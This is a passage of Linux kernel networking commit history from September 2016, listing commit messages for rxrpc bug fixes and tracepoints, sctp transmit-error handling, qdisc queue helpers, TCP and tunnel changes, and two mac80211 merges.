 iQIVAwUAV90ZnPSw1s6N8H32AQKguA//Q7lvTa3n3DFvMQcIPsyJZ6VniUqksTA1
 wmQrw4GHXRUgM8UWz7G9Y5aqxUp2q6y6Vm9BeHkQ2bYZjSrOx5Dc/AImWhBn5au+
 h+HZYcEs4mFM5AoVT7GK8o/nNODDjNt2qwcH/Nf8+SM7Xf52zYHelrSteLZZ1YWO
 S1m4pa5YUBa/ICD3+K52lWq9SCG0VMmy41UHDXU6uSakfN62rn9ZYCcNeathlJGS
 2D0cG3GzYYHiBZ1CkmdPQgGQhTM3wzI+0OvbNnidFlF78zVDlxX8C9zgWs/VlTCg
 02ok4+ftzDojgXH9W+DziEiyCNq14GTDbrdSai5WA+vHVGagr6OoSwDWgPHkXBvW
 pYQh7jqRoBOKN2fsVkU0t19hPc2CCVGYMh49A6AFv8lgS+nWoDXOlmZ0snh8deQg
 Z0HO5mx+V+4yJplBlwH6ncvbRB9ywpsvIuLriZXC/aJg6aY4a8nrU35d1+6xUaM7
 RBMud0uj+7oU+sC9N7CuM8m8HpBOg6+qAsbsfATSwadMRcMdS4LSoXcBg0WvljIH
 JmtL924yEnMDw1yPkmuDBcQ9K6DuxeOYZg4A2756tBtGulxuVjntmI1MVAQlsbqH
 CnNPWpxIDoLRQsHVcYWS5O1F16drGobzFhmj7Hf/6HmGa28x7nQhDafzfFj/3Dos
 MAdM2pdO2x8=
 =MjVT
 -----END PGP SIGNATURE-----

Merge tag 'rxrpc-rewrite-20160917-1' of git://git.kernel.org/pub/scm/linux/kernel/git/dhowells/linux-fs

David Howells says:

====================
rxrpc: Fixes & miscellany

Here are some more AF_RXRPC fix patches with a couple of miscellaneous
changes also.  Fixes include:

 (1) Make RxRPC IPv6 support conditional on IPv6 being available.

 (2) Move the condition check in rxrpc_locate_data() into the caller and
     check the error return.

 (3) Fix the detection of the last received packet in recvmsg.

 (4) Account calls that need acceptance and clean up any unaccepted ones if
     the socket gets closed.

 (5) Fix the cleanup of client connections.

 (6) Fix the soft-ACK parsing and the retransmission of packets based on
     those ACKs.

 (7) Suppress transmission of an ACK when there's no pending ACK to
     transmit because another thread stole it.

And some miscellany:

 (8) Whitespace removal.

 (9) Switch-value consistency in rxrpc_send_call_packet().

(10) Fix the basic transmission packet size to allow for spur-of-the-moment
     jumbo DATA packet production.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-19 01:51:21 -04:00
Florian Westphal
48da34b7a7 sched: add and use qdisc_skb_head helpers
This change replaces sk_buff_head struct in Qdiscs with new qdisc_skb_head.

Its similar to the skb_buff_head api, but does not use skb->prev pointers.

Qdiscs will commonly enqueue at the tail of a list and dequeue at head.
While skb_buff_head works fine for this, enqueue/dequeue needs to also
adjust the prev pointer of next element.

The ->prev pointer is not required for qdiscs so we can just leave
it undefined and avoid one cacheline write access for en/dequeue.

Suggested-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-19 01:47:18 -04:00
Florian Westphal
ed760cb8aa sched: replace __skb_dequeue with __qdisc_dequeue_head
After previous patch these functions are identical.
Replace __skb_dequeue in qdiscs with __qdisc_dequeue_head.

Next patch will then make __qdisc_dequeue_head handle
single-linked list instead of strcut sk_buff_head argument.

Doesn't change generated code.

Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-19 01:47:18 -04:00
Florian Westphal
ec32336879 sched: remove qdisc arg from __qdisc_dequeue_head
Moves qdisc stat accouting to qdisc_dequeue_head.

The only direct caller of the __qdisc_dequeue_head version open-codes
this now.

This allows us to later use __qdisc_dequeue_head as a replacement
of __skb_dequeue() (which operates on sk_buff_head list).

Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-19 01:47:18 -04:00
Florian Westphal
97d0678f91 sched: don't use skb queue helpers
A followup change will replace the sk_buff_head in the qdisc
struct with a slightly different list.

Use of the sk_buff_head helpers will thus cause compiler
warnings.

Open-code these accesses in an extra change to ease review.

Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-19 01:47:18 -04:00
Florian Westphal
1486587b2f pie: use qdisc_dequeue_head wrapper
Doesn't change generated code.

Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-19 01:47:18 -04:00
Christophe Jaillet
e8bc8f9a67 sctp: Remove some redundant code
In commit 311b21774f ("sctp: simplify sk_receive_queue locking"), a call
to 'skb_queue_splice_tail_init()' has been made explicit. Previously it was
hidden in 'sctp_skb_list_tail()'

Now, the code around it looks redundant. The '_init()' part of
'skb_queue_splice_tail_init()' should already do the same.

Signed-off-by: Christophe JAILLET <christophe.jaillet@wanadoo.fr>
Acked-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-19 01:34:01 -04:00
Mahesh Bandewar
e8bffe0cf9 net: Add _nf_(un)register_hooks symbols
Add _nf_register_hooks() and _nf_unregister_hooks() calls which allow
caller to hold RTNL mutex.

Signed-off-by: Mahesh Bandewar <maheshb@google.com>
CC: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-19 01:25:22 -04:00
Mahesh Bandewar
d409b84768 ipv6: Export p6_route_input_lookup symbol
Make ip6_route_input_lookup available outside of ipv6 the module
similar to ip_route_input_noref in the IPv4 world.

Signed-off-by: Mahesh Bandewar <maheshb@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-19 01:25:22 -04:00
Nogah Frankel
69ae6ad2ff net: core: Add offload stats to if_stats_msg
Add a nested attribute of offload stats to if_stats_msg
named IFLA_STATS_LINK_OFFLOAD_XSTATS.
Under it, add SW stats, meaning stats only per packets that went via
slowpath to the cpu, named IFLA_OFFLOAD_XSTATS_CPU_HIT.

Signed-off-by: Nogah Frankel <nogahf@mellanox.com>
Signed-off-by: Jiri Pirko <jiri@mellanox.com>
Acked-by: Nikolay Aleksandrov <nikolay@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-18 22:33:42 -04:00
David S. Miller
c13ed534b8 This time we have various things - all across the board:
* MU-MIMO sniffer support in mac80211
  * a create_singlethread_workqueue() cleanup
  * interface dump filtering that was documented but not implemented
  * support for the new radiotap timestamp field
  * send delBA in two unexpected conditions (as required by the spec)
  * connect keys cleanups - allow only WEP with index 0-3
  * per-station aggregation limit to work around broken APs
  * debugfs improvement for the integrated codel algorithm
 and various other small improvements and cleanups.
 -----BEGIN PGP SIGNATURE-----
 
 iQIcBAABCgAGBQJX2+umAAoJEGt7eEactAAdIMkP/jMmpbxkzD64L7nTkO4APGva
 r6RmMM1SmgVD/CtVkjlBLuvo5YOTWv/vWvy6KoUESOINAx/e6T3T7bmmCOXzbsOL
 e5/YYcS1AOqgn5SdhgIj1E5cpdYIhlUGRlNJ0qEjeLLrh4/TLUNbCcuPhOYybUMz
 fUrdPKgDeWb7x9EHLENhPsVtCXWwKnkDIS4qclPZCWgRj46XM4pNB4OlvCUzGY6k
 bOqGJfrtjYjgKFDmPFqfYA4JDA56980qqO41+eEKXeMvDKNs+pSiNco130Q+uU3E
 o7tk9DMnAnCy2GihpV1ZYVkLr6O+7o9xVuenj3NRlhyd1mn2gXxLcO4AkHcrZBkf
 Ei+2L+KgnWELyqiSOaGTJKlugsgS4DDoNnFEIVjSweQ9DIoBA/Gj/6+4uZeHXJ3M
 bEjtHnCLi5CuI067uBoevwXFoMi1poWra2KnZKOZzFS5OL3xHv4//x/Wmnn2/5Jz
 ffEwVyRmTY76sLWfnwXUDClrFWAYQrpNyTryc+k3cpYKzhnseiqt+z43cBuISm00
 uh5B9PpPB8RhtUnXrL/SHRyf8YEluaidTsI2lc1LvwXOc0+Zbp73mTCgP+rzLs9p
 K2qVRiozpIXanW6hKmmaDwjKlcAKKLP0xN2v90MqwQt4YdLIKlXnll1AH2BawzuP
 OWB3n8D0I6y0PWH+Yo8o
 =s1MY
 -----END PGP SIGNATURE-----

Merge tag 'mac80211-next-for-davem-2016-09-16' of git://git.kernel.org/pub/scm/linux/kernel/git/jberg/mac80211-next

Johannes Berg says:

====================
This time we have various things - all across the board:
 * MU-MIMO sniffer support in mac80211
 * a create_singlethread_workqueue() cleanup
 * interface dump filtering that was documented but not implemented
 * support for the new radiotap timestamp field
 * send delBA in two unexpected conditions (as required by the spec)
 * connect keys cleanups - allow only WEP with index 0-3
 * per-station aggregation limit to work around broken APs
 * debugfs improvement for the integrated codel algorithm
and various other small improvements and cleanups.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-18 22:29:08 -04:00
David S. Miller
7ac327318e Two more fixes:
* reject aggregation sessions for TSID/TID 8-16 that we
    can never use anyway and which could confuse drivers
  * check return value of skb_linearize()
 -----BEGIN PGP SIGNATURE-----
 
 iQIcBAABCgAGBQJX2+l7AAoJEGt7eEactAAdedMP/0k225qWRR+19lavkZ3/lSqb
 YiQdYNwKCZf9WR+5FiQKFcTV4XMCfKiWX2eJJWqFI5r+V4mfTJAZDehZpddCvJou
 KW3dZYe25+DaFApdhQiJXTxKSeJAbRB7EWT4i0P54Ned0YUeFwwOjvxuH+fq2VY0
 tScX5JogPuGFVzXhlqUVZTjbHlBkcILGv7QjOXXL9yf4d2x57uXyabOB14l351RF
 4hqXm7u+JQedbGjhYHDMKnyuwXQW4mbhELBdyMh7heLPqufWf4Xakrwh8WYSKuBb
 H5dICeq+/JPKnwOStmwtz1FQVIlU08PMLnWzQbByrkDvQPCIkMHLu6h6oNierqAH
 z4vyy8w05KzFNG3R5egygopXbncZvSOCcOPkDQxbTYmh2tK97OMUjXbUfPEUXZs2
 WbSuECm+RVSNKtLlUip7TrM3iYI7xmCN/qPB4Wuq+z/JiSOrnP+G047iUbhdDpnE
 fwLmRWWdEGkjnv3TFdzzxLVAJPCQWyuLfxaUBlHlYRNqBY8ufTR3FHUKj4dVwqJK
 EqnSiDUqbZE6qJw516MEp+CqZGb8hzeMCeAu+docWMa3CmnNlglZtYgNiou45y9Z
 9/8dAO93/qAzsaw9A/XprnIVPcu1vsFSicrhjOdZsnYoVJDGoW6rjzz6HpCk9QxB
 7FjxZ5LilJ5Ws4ltlwr7
 =3dek
 -----END PGP SIGNATURE-----

Merge tag 'mac80211-for-davem-2016-09-16' of git://git.kernel.org/pub/scm/linux/kernel/git/jberg/mac80211

Johannes Berg says:

====================
Two more fixes:
 * reject aggregation sessions for TSID/TID 8-16 that we
   can never use anyway and which could confuse drivers
 * check return value of skb_linearize()
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-18 22:26:49 -04:00
Eric Dumazet
695b4ec0f0 pkt_sched: fq: use proper locking in fq_dump_stats()
When fq is used on 32bit kernels, we need to lock the qdisc before
copying 64bit fields.

Otherwise "tc -s qdisc ..." might report bogus values.

Fixes: afe4fd0624 ("pkt_sched: fq: Fair Queue packet scheduler")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-18 22:15:08 -04:00
Thadeu Lima de Souza Cascardo
db74a3335e openvswitch: use percpu flow stats
Instead of using flow stats per NUMA node, use it per CPU. When using
megaflows, the stats lock can be a bottleneck in scalability.

On a E5-2690 12-core system, usual throughput went from ~4Mpps to
~15Mpps when forwarding between two 40GbE ports with a single flow
configured on the datapath.

This has been tested on a system with possible CPUs 0-7,16-23. After
module removal, there were no corruption on the slab cache.

Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@redhat.com>
Cc: pravin shelar <pshelar@ovn.org>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-18 22:14:01 -04:00
Thadeu Lima de Souza Cascardo
40773966cc openvswitch: fix flow stats accounting when node 0 is not possible
On a system with only node 1 as possible, all statistics is going to be
accounted on node 0 as it will have a single writer.

However, when getting and clearing the statistics, node 0 is not going
to be considered, as it's not a possible node.

Tested that statistics are not zero on a system with only node 1
possible. Also compile-tested with CONFIG_NUMA off.

Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@redhat.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-18 22:14:01 -04:00
Xin Long
41001faf95 sctp: not return ENOMEM err back in sctp_packet_transmit
As David and Marcelo's suggestion, ENOMEM err shouldn't return back to
user in transmit path. Instead, sctp's retransmit would take care of
the chunks that fail to send because of ENOMEM.

This patch is only to do some release job when alloc_skb fails, not to
return ENOMEM back any more.

Besides, it also cleans up sctp_packet_transmit's err path, and fixes
some issues in err path:

 - It didn't free the head skb in nomem: path.
 - No need to check nskb in no_route: path.
 - It should goto err: path if alloc_skb fails for head.
 - Not all the NOMEMs should free nskb.

Signed-off-by: Xin Long <lucien.xin@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-18 22:02:33 -04:00
Xin Long
83dbc3d4a3 sctp: make sctp_outq_flush/tail/uncork return void
sctp_outq_flush return value is meaningless now, this patch is
to make sctp_outq_flush return void, as well as sctp_outq_fail
and sctp_outq_uncork.

Signed-off-by: Xin Long <lucien.xin@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-18 22:02:33 -04:00
Xin Long
645194409b sctp: save transmit error to sk_err in sctp_outq_flush
Every time when sctp calls sctp_outq_flush, it sends out the chunks of
control queue, retransmit queue and data queue. Even if some trunks are
failed to transmit, it still has to flush all the transports, as it's
the only chance to clean that transmit_list.

So the latest transmit error here should be returned back. This transmit
error is an internal error of sctp stack.

I checked all the places where it uses the transmit error (the return
value of sctp_outq_flush), most of them are actually just save it to
sk_err.

Except for sctp_assoc/endpoint_bh_rcv, they will drop the chunk if
it's failed to send a REPLY, which is actually incorrect, as we can't
be sure the error that sctp_outq_flush returns is from sending that
REPLY.

So it's meaningless for sctp_outq_flush to return error back.

This patch is to save transmit error to sk_err in sctp_outq_flush, the
new error can update the old value. Eventually, sctp_wait_for_* would
check for it.

Signed-off-by: Xin Long <lucien.xin@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-18 22:02:32 -04:00
Xin Long
b61c654f9b sctp: free msg->chunks when sctp_primitive_SEND return err
Last patch "sctp: do not return the transmit err back to sctp_sendmsg"
made sctp_primitive_SEND return err only when asoc state is unavailable.
In this case, chunks are not enqueued, they have no chance to be freed if
we don't take care of them later.

This Patch is actually to revert commit 1cd4d5c432 ("sctp: remove the
unused sctp_datamsg_free()"), commit 69b5777f2e ("sctp: hold the chunks
only after the chunk is enqueued in outq") and commit 8b570dc9f7 ("sctp:
only drop the reference on the datamsg after sending a msg"), to use
sctp_datamsg_free to free the chunks of current msg.

Fixes: 8b570dc9f7 ("sctp: only drop the reference on the datamsg after sending a msg")
Signed-off-by: Xin Long <lucien.xin@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-18 22:02:32 -04:00
Xin Long
66388f2c08 sctp: do not return the transmit err back to sctp_sendmsg
Once a chunk is enqueued successfully, sctp queues can take care of it.
Even if it is failed to transmit (like because of nomem), it should be
put into retransmit queue.

If sctp report this error to users, it confuses them, they may resend
that msg, but actually in kernel sctp stack is in charge of retransmit
it already.

Besides, this error probably is not from the failure of transmitting
current msg, but transmitting or retransmitting another msg's chunks,
as sctp_outq_flush just tries to send out all transports' chunks.

This patch is to make sctp_cmd_send_msg return avoid, and not return the
transmit err back to sctp_sendmsg

Fixes: 8b570dc9f7 ("sctp: only drop the reference on the datamsg after sending a msg")
Signed-off-by: Xin Long <lucien.xin@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-18 22:02:32 -04:00
Xin Long
2c89791eeb sctp: remove the unnecessary state check in sctp_outq_tail
Data Chunks are only sent by sctp_primitive_SEND, in which sctp checks
the asoc's state through statetable before calling sctp_outq_tail. So
there's no need to check the asoc's state again in sctp_outq_tail.

Besides, sctp_do_sm is protected by lock_sock, even if sending msg is
interrupted by timer events, the event's processes still need to acquire
lock_sock first. It means no others CMDs can be enqueue into side effect
list before CMD_SEND_MSG to change asoc->state, so it's safe to remove it.

This patch is to remove redundant asoc->state check from sctp_outq_tail.

Signed-off-by: Xin Long <lucien.xin@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-18 22:02:32 -04:00
Alexei Starovoitov
8d79266bc4 ip6_tunnel: add collect_md mode to IPv6 tunnels
Similar to gre, vxlan, geneve tunnels allow IPIP6 and IP6IP6 tunnels
to operate in 'collect metadata' mode.
Unlike ipv4 code here it's possible to reuse ip6_tnl_xmit() function
for both collect_md and traditional tunnels.
bpf_skb_[gs]et_tunnel_key() helpers and ovs (in the future) are the users.

Signed-off-by: Alexei Starovoitov <ast@kernel.org>
Acked-by: Thomas Graf <tgraf@suug.ch>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-17 10:13:07 -04:00
Alexei Starovoitov
cfc7381b30 ip_tunnel: add collect_md mode to IPIP tunnel
Similar to gre, vxlan, geneve tunnels allow IPIP tunnels to
operate in 'collect metadata' mode.
bpf_skb_[gs]et_tunnel_key() helpers can make use of it right away.
ovs can use it as well in the future (once appropriate ovs-vport
abstractions and user apis are added).
Note that just like in other tunnels we cannot cache the dst,
since tunnel_info metadata can be different for every packet.

Signed-off-by: Alexei Starovoitov <ast@kernel.org>
Acked-by: Thomas Graf <tgraf@suug.ch>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-17 10:13:07 -04:00
Julia Lawall
eb94737d71 l2tp: constify net_device_ops structures
Check for net_device_ops structures that are only stored in the netdev_ops
field of a net_device structure.  This field is declared const, so
net_device_ops structures that have this property can be declared as const
also.

The semantic patch that makes this change is as follows:
(http://coccinelle.lip6.fr/)

// <smpl>
@r disable optional_qualifier@
identifier i;
position p;
@@
static struct net_device_ops i@p = { ... };

@ok@
identifier r.i;
struct net_device e;
position p;
@@
e.netdev_ops = &i@p;

@bad@
position p != {r.p,ok.p};
identifier r.i;
struct net_device_ops e;
@@
e@i@p

@depends on !bad disable optional_qualifier@
identifier r.i;
@@
static
+const
 struct net_device_ops i = { ... };
// </smpl>

The result of size on this file before the change is:
   text	      data     bss     dec         hex	  filename
   3401        931      44    4376        1118	net/l2tp/l2tp_eth.o

and after the change it is:
   text	     data        bss	    dec	    hex	filename
   3993       347         44       4384    1120	net/l2tp/l2tp_eth.o

Signed-off-by: Julia Lawall <Julia.Lawall@lip6.fr>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-17 10:07:23 -04:00
Alan Cox
5ff904d55d llc: switch type to bool as the timeout is only tested versus 0
(As asked by Dave in Februrary)

Signed-off-by: Alan Cox <alan@linux.intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-17 10:05:05 -04:00
Eric Dumazet
3613b3dbd1 tcp: prepare skbs for better sack shifting
With large BDP TCP flows and lossy networks, it is very important
to keep a low number of skbs in the write queue.

RACK and SACK processing can perform a linear scan of it.

We should avoid putting any payload in skb->head, so that SACK
shifting can be done if needed.

With this patch, we allow to pack ~0.5 MB per skb instead of
the 64KB initially cooked at tcp_sendmsg() time.

This gives a reduction of number of skbs in write queue by eight.
tcp_rack_detect_loss() likes this.

We still allow payload in skb->head for first skb put in the queue,
to not impact RPC workloads.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Yuchung Cheng <ycheng@google.com>
Acked-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-17 10:05:05 -04:00
phil.turnbull@oracle.com
8ab86c00e3 irda: Free skb on irda_accept error path.
skb is not freed if newsk is NULL. Rework the error path so free_skb is
unconditionally called on function exit.

Fixes: c3ea9fa274 ("[IrDA] af_irda: IRDA_ASSERT cleanups")
Signed-off-by: Phil Turnbull <phil.turnbull@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-17 09:59:31 -04:00
Eric Dumazet
ffb4d6c850 tcp: fix overflow in __tcp_retransmit_skb()
If a TCP socket gets a large write queue, an overflow can happen
in a test in __tcp_retransmit_skb() preventing all retransmits.

The flow then stalls and resets after timeouts.

Tested:

sysctl -w net.core.wmem_max=1000000000
netperf -H dest -- -s 1000000000

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-17 09:59:30 -04:00
David Howells
8a681c3605 rxrpc: Add config to inject packet loss
Add a configuration option to inject packet loss by discarding
approximately every 8th packet received and approximately every 8th DATA
packet transmitted.

Note that no locking is used, but it shouldn't really matter.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 11:24:04 +01:00
David Howells
71f3ca408f rxrpc: Improve skb tracing
Improve sk_buff tracing within AF_RXRPC by the following means:

 (1) Use an enum to note the event type rather than plain integers and use
     an array of event names rather than a big multi ?: list.

 (2) Distinguish Rx from Tx packets and account them separately.  This
     requires the call phase to be tracked so that we know what we might
     find in rxtx_buffer[].

 (3) Add a parameter to rxrpc_{new,see,get,free}_skb() to indicate the
     event type.

 (4) A pair of 'rotate' events are added to indicate packets that are about
     to be rotated out of the Rx and Tx windows.

 (5) A pair of 'lost' events are added, along with rxrpc_lose_skb() for
     packet loss injection recording.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 11:24:04 +01:00
David Howells
ba39f3a0ed rxrpc: Remove printks from rxrpc_recvmsg_data() to fix uninit var
Remove _enter/_debug/_leave calls from rxrpc_recvmsg_data() of which one
uses an uninitialised variable.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 11:24:04 +01:00
David Howells
849979051c rxrpc: Add a tracepoint to follow what recvmsg does
Add a tracepoint to follow what recvmsg does within AF_RXRPC.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 11:24:03 +01:00
David Howells
58dc63c998 rxrpc: Add a tracepoint to follow packets in the Rx buffer
Add a tracepoint to follow the life of packets that get added to a call's
receive buffer.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 11:24:03 +01:00
David Howells
f3639df2d9 rxrpc: Add a tracepoint to log ACK transmission
Add a tracepoint to log information about ACK transmission.

Signed-off-by: David Howels <dhowells@redhat.com>
2016-09-17 11:24:03 +01:00
David Howells
ec71eb9ada rxrpc: Add a tracepoint to log received ACK packets
Add a tracepoint to log information from received ACK packets.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 11:24:03 +01:00
David Howells
a124fe3ee5 rxrpc: Add a tracepoint to follow the life of a packet in the Tx buffer
Add a tracepoint to follow the insertion of a packet into the transmit
buffer, its transmission and its rotation out of the buffer.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 11:24:03 +01:00
David Howells
363deeab6d rxrpc: Add connection tracepoint and client conn state tracepoint
Add a pair of tracepoints, one to track rxrpc_connection struct ref
counting and the other to track the client connection cache state.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 11:24:03 +01:00
David Howells
a84a46d730 rxrpc: Add some additional call tracing
Add additional call tracepoint points for noting call-connected,
call-released and connection-failed events.

Also fix one tracepoint that was using an integer instead of the
corresponding enum value as the point type.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 11:24:03 +01:00
David Howells
a3868bfc8d rxrpc: Print the packet type name in the Rx packet trace
Print a symbolic packet type name for each valid received packet in the
trace output, not just a number.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 11:24:03 +01:00
David Howells
182f505624 rxrpc: Fix the basic transmit DATA packet content size at 1412 bytes
Fix the basic transmit DATA packet content size at 1412 bytes so that they
can be arbitrarily assembled into jumbo packets.

In the future, I'm thinking of moving to keeping a jumbo packet header at
the beginning of each packet in the Tx queue and creating the packet header
on the spot when kernel_sendmsg() is invoked.  That way, jumbo packets can
be assembled on the spur of the moment for (re-)transmission.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 10:54:32 +01:00
David Howells
2311e327cd rxrpc: Be consistent about switch value in rxrpc_send_call_packet()
rxrpc_send_call_packet() should use type in both its switch-statements
rather than using pkt->whdr.type.  This might give the compiler an easier
job of uninitialised variable checking.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 10:54:21 +01:00
David Howells
27d0fc431c rxrpc: Don't transmit an ACK if there's no reason set
Don't transmit an ACK if call->ackr_reason in unset.  There's the
possibility of a race between recvmsg() sending an ACK and the background
processing thread trying to send the same one.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 10:53:55 +01:00
David Howells
dfa7d92040 rxrpc: Fix retransmission algorithm
Make the retransmission algorithm use for-loops instead of do-loops and
move the counter increments into the for-statement increment slots.

Though the do-loops are slighly more efficient since there will be at least
one pass through the each loop, the counter increments are harder to get
right as the continue-statements skip them.

Without this, if there are any positive acks within the loop, the do-loop
will cycle forever because the counter increment is never done.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 10:53:21 +01:00
David Howells
d01dc4c3c1 rxrpc: Fix the parsing of soft-ACKs
The soft-ACK parser doesn't increment the pointer into the soft-ACK list,
resulting in the first ACK/NACK value being applied to all the relevant
packets in the Tx queue.  This has the potential to miss retransmissions
and cause excessive retransmissions.

Fix this by incrementing the pointer.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 10:53:21 +01:00
David Howells
78883793f8 rxrpc: Fix unexposed client conn release
If the last call on a client connection is release after the connection has
had a bunch of calls allocated but before any DATA packets are sent (so
that it's not yet marked RXRPC_CONN_EXPOSED), an assertion will happen in
rxrpc_disconnect_client_call().

	af_rxrpc: Assertion failed - 1(0x1) >= 2(0x2) is false
	------------[ cut here ]------------
	kernel BUG at ../net/rxrpc/conn_client.c:753!

This is because it's expecting the conn to have been exposed and to have 2
or more refs - but this isn't necessarily the case.

Simply remove the assertion.  This allows the conn to be moved into the
inactive state and deleted if it isn't resurrected before the final put is
called.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 10:53:21 +01:00
David Howells
357f5ef646 rxrpc: Call rxrpc_release_call() on error in rxrpc_new_client_call()
Call rxrpc_release_call() on getting an error in rxrpc_new_client_call()
rather than trying to do the cleanup ourselves.  This isn't a problem,
provided we set RXRPC_CALL_HAS_USERID only if we actually add the call to
the calls tree as cleanup code fragments that would otherwise cause
problems are conditional.

Without this, we miss some of the cleanup.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 10:53:21 +01:00
David Howells
66d58af7f4 rxrpc: Fix the putting of client connections
In rxrpc_put_one_client_conn(), if a connection has RXRPC_CONN_COUNTED set
on it, then it's accounted for in rxrpc_nr_client_conns and may be on
various lists - and this is cleaned up correctly.

However, if the connection doesn't have RXRPC_CONN_COUNTED set on it, then
the put routine returns rather than just skipping the extra bit of cleanup.

Fix this by making the extra bit of clean up conditional instead and always
killing off the connection.

This manifests itself as connections with a zero usage count hanging around
in /proc/net/rxrpc_conns because the connection allocated, but discarded,
due to a race with another process that set up a parallel connection, which
was then shared instead.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 10:53:20 +01:00
David Howells
0360da6db7 rxrpc: Purge the to_be_accepted queue on socket release
Purge the queue of to_be_accepted calls on socket release.  Note that
purging sock_calls doesn't release the ref owned by to_be_accepted.

Probably the sock_calls list is redundant given a purges of the recvmsg_q,
the to_be_accepted queue and the calls tree.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 10:51:54 +01:00
David Howells
e6f3afb3fc rxrpc: Record calls that need to be accepted
Record calls that need to be accepted using sk_acceptq_added() otherwise
the backlog counter goes negative because sk_acceptq_removed() is called.
This causes the preallocator to malfunction.

Calls that are preaccepted by AFS within the kernel aren't affected by
this.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 10:51:54 +01:00
David Howells
816c9fce12 rxrpc: Fix handling of the last packet in rxrpc_recvmsg_data()
The code for determining the last packet in rxrpc_recvmsg_data() has been
using the RXRPC_CALL_RX_LAST flag to determine if the rx_top pointer points
to the last packet or not.  This isn't a good idea, however, as the input
code may be running simultaneously on another CPU and that sets the flag
*before* updating the top pointer.

Fix this by the following means:

 (1) Restrict the use of RXRPC_CALL_RX_LAST to the input routines only.
     There's otherwise a synchronisation problem between detecting the flag
     and checking tx_top.  This could probably be dealt with by appropriate
     application of memory barriers, but there's a simpler way.

 (2) Set RXRPC_CALL_RX_LAST after setting rx_top.

 (3) Make rxrpc_rotate_rx_window() consult the flags header field of the
     DATA packet it's about to discard to see if that was the last packet.
     Use this as the basis for ending the Rx phase.  This shouldn't be a
     problem because the recvmsg side of things is guaranteed to see the
     packets in order.

 (4) Make rxrpc_recvmsg_data() return 1 to indicate the end of the data if:

     (a) the packet it has just processed is marked as RXRPC_LAST_PACKET

     (b) the call's Rx phase has been ended.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 10:51:54 +01:00
David Howells
2e2ea51dec rxrpc: Check the return value of rxrpc_locate_data()
Check the return value of rxrpc_locate_data() in rxrpc_recvmsg_data().

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 10:50:49 +01:00
David Howells
4b22457c06 rxrpc: Move the check of rx_pkt_offset from rxrpc_locate_data() to caller
Move the check of rx_pkt_offset from rxrpc_locate_data() to the caller,
rxrpc_recvmsg_data(), so that it's more clear what's going on there.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-17 10:50:48 +01:00
David Howells
fabf920180 rxrpc: Remove some whitespace.
